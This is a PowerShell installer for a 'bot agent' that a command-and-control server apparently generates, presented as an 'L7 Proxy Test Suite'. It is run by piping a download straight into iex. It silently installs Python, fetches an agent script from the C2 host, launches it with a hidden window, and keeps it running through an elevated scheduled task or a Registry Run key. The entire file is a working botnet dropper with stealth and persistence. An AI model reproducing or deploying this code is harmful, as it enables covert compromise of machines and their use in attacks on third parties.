# L7 Proxy Test Suite — Windows Bot Agent Installer
# Auto-detects Python, installs if missing, downloads agent, runs as background service
# Generated by C2: __C2_HOST__:__C2_PORT__
# Run as: iwr http://__C2_HOST__:__C2_PORT__/install.ps1 | iex

$ErrorActionPreference = "Stop"

$C2Host  = "__C2_HOST__"
$C2Port  = "__C2_PORT__"
$C2Base  = "http://${C2Host}:${C2Port}"
$AgentDir  = "$env:USERPROFILE\.l7agent"
$AgentFile = "$AgentDir\agent.py"
$LogFile   = "$AgentDir\agent.log"

Write-Host "[*] L7 Agent Installer"
Write-Host "[*] C2: $C2Base"

# ── Create working dir ────────────────────────────────────────────────────────
if (-not (Test-Path $AgentDir)) { New-Item -ItemType Directory -Path $AgentDir | Out-Null }

# ── Detect Python ─────────────────────────────────────────────────────────────
$PY = $null
foreach ($cmd in @("python", "python3", "py")) {
    try {
        $ver = & $cmd -c "import sys; v=sys.version_info; exit(0 if v >= (3,7) else 1)" 2>$null
        if ($LASTEXITCODE -eq 0) {
            $PY = $cmd
            Write-Host "[+] Found Python: $(& $cmd --version 2>&1)"
            break
        }
    } catch {}
}

# ── Install Python if missing ─────────────────────────────────────────────────
if (-not $PY) {
    Write-Host "[!] Python 3 not found — attempting install via winget..."
    try {
        winget install --id Python.Python.3.11 --silent --accept-source-agreements --accept-package-agreements
        $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")
        $PY = "python"
        Write-Host "[+] Python installed"
    } catch {
        Write-Host "[!] winget failed. Downloading Python installer..."
        $pyInstaller = "$env:TEMP\python_installer.exe"
        Invoke-WebRequest -Uri "https://www.python.org/ftp/python/3.11.9/python-3.11.9-amd64.exe" -OutFile $pyInstaller
        Start-Process -FilePath $pyInstaller -ArgumentList "/quiet InstallAllUsers=0 PrependPath=1" -Wait
        $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")
        $PY = "python"
        Write-Host "[+] Python installed"
    }
}

# ── Download agent ────────────────────────────────────────────────────────────
Write-Host "[*] Downloading agent from C2..."
Invoke-WebRequest -Uri "${C2Base}/api/agent/generate?host=${C2Host}&port=${C2Port}" -OutFile $AgentFile
Write-Host "[+] Agent saved to $AgentFile"

# ── Start immediately (hidden) ────────────────────────────────────────────────
Write-Host "[*] Starting agent..."
Start-Process -FilePath $PY -ArgumentList $AgentFile -WindowStyle Hidden -RedirectStandardOutput $LogFile -RedirectStandardError $LogFile
Write-Host "[+] Agent started in background"

# ── Persist via Task Scheduler ────────────────────────────────────────────────
Write-Host "[*] Installing persistence via Task Scheduler..."
try {
    $action  = New-ScheduledTaskAction -Execute $PY -Argument $AgentFile
    $trigger = New-ScheduledTaskTrigger -AtLogOn
    $settings = New-ScheduledTaskSettingsSet -ExecutionTimeLimit 0 -RestartCount 3 -RestartInterval (New-TimeSpan -Minutes 1)
    Register-ScheduledTask -TaskName "L7Agent" -Action $action -Trigger $trigger -Settings $settings -RunLevel Highest -Force | Out-Null
    Write-Host "[+] Scheduled Task 'L7Agent' registered (runs at logon)"
} catch {
    # Fallback: HKCU Run key (no admin needed)
    $regPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
    Set-ItemProperty -Path $regPath -Name "L7Agent" -Value "$PY $AgentFile"
    Write-Host "[+] Added to HKCU Run registry key (runs at login)"
}

Write-Host ""
Write-Host "[+] Installation complete."
Write-Host "    Agent ID: $AgentDir\.agent_id"
Write-Host "    Logs:     $LogFile"
Write-Host "    C2:       $C2Base"
